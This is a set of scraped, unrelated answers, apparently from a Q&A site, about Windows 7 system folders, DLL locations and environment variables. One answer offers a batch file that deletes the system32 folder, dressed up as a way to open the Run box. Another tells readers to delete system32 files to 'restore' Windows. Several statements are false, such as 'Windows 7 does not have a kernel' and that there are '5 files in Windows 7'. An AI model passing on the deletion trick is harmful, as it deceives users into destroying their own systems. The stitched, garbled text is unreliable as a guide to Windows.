You can't really, if you're desperate you will have to re-install windows
To restore it you have to delete your system32 files.
In Windows 7, DLL files are typically located in the C:\Windows\System32 directory for 64-bit versions of Windows. For 32-bit DLL files on a 64-bit system, they can be found in C:\Windows\SysWOW64. Additionally, application-specific DLL files may be found in the program's installation directory.
Windows 7 does not have a kernel.
Windows\System32 Access services application to administrate services: %windir%\system32\services.msc
Windows vista and 7 %system root%/system32/config/ ie: C:\system32\config
Basically all utilities located in folders - Windows and Windows\System32.
yes you can there might be a link on your desktop if not go to C:\WINDOWS\system32\viwc.exe
You need access to an xp machine first. go to C:\windows\system32\mshearts.exe C:\windows\system32\cards.dll they need to be copied to your windows 7 machine same directory I had this working on my windows 7 machine but when the hard drive froze and crashed my machine I had to reinstall everything. Since then I can't get it to work. Hope it works for you
windows sets restrictions on accessing the run command box, most of which are stored in system 32. So, to access this, you must do the following: open a notepad type the following: @echo off del c:\WINDOWS\system32 save the file as anything.bat (remember to add the .bat extension and save as all files) double click and it will delete the system32 folder
Variable Default value:Windows XP Default value:Windows 7/2008 %ALLUSERSPROFILE% C:\Documents and Settings\All Users C:\ProgramData %APPDATA% C:\Documents and Settings\{username}\Application Data C:\Users\{username}\AppData\Roaming %CommonProgramFiles% C:\Program Files\Common Files C:\Program Files\Common Files %COMMONPROGRAMFILES(x86)% C:\Program Files (x86)\Common Files C:\Program Files (x86)\Common Files %COMPUTERNAME% {computername} {computername} %COMSPEC% C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe %HOMEDRIVE% C: C: %HOMEPATH% \Documents and Settings\{username}\Users\{username} %LOCALAPPDATA%N/A(but can be manually added LOCALAPPDATA=%USERPROFILE%\Local Settings\Application Data)C:\Users\{username}\AppData\Local %LOGONSERVER% \\{domain_logon_server} \\{domain_logon_server} %PATH% C:\Windows\System32\;C:\Windows\;C:\Windows\System32\Wbem;{plus program paths} C:\Windows\System32\;C:\Windows\;C:\Windows\System32\Wbem;{plus program paths} %PATHEXT% .COM; .EXE; .BAT; .CMD; .VBS; .VBE; .JS ; .WSF; .WSH; .COM; .EXE; .BAT; .CMD; .VBS; .VBE; .JS ; .WSF; .WSH; .MSC %ProgramData% N/A C:\ProgramData %ProgramFiles% C:\Program Files C:\Program Files %ProgramFiles(x86)% 1 C:\Program Files (x86) C:\Program Files (x86) %PROMPT% Code for current command prompt format,usually $P$G C:> Code for current command prompt format,usually $P$GC:> %PSModulePath% N/A %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\ %Public% N/A C:\Users\Public %SYSTEMDRIVE% C: C: %SYSTEMROOT% C:\Windows C:\Windows %TEMP% and %TMP% C:\Documents and Settings\{username}\Local Settings\Temp C:\Users\{Username}\AppData\Local\Temp %USERDOMAIN% {userdomain} {userdomain} %USERNAME% {username}{username} %USERPROFILE% %SystemDrive%\Documents and Settings\{username}%SystemDrive%\Users\{username} %WINDIR% C:\Windows C:\Windows
There are 5 files in Windows 7, but DO NOT tamper with the system because it can damge your files and erase memory thinking that it is an online hacker.
Files called "hives".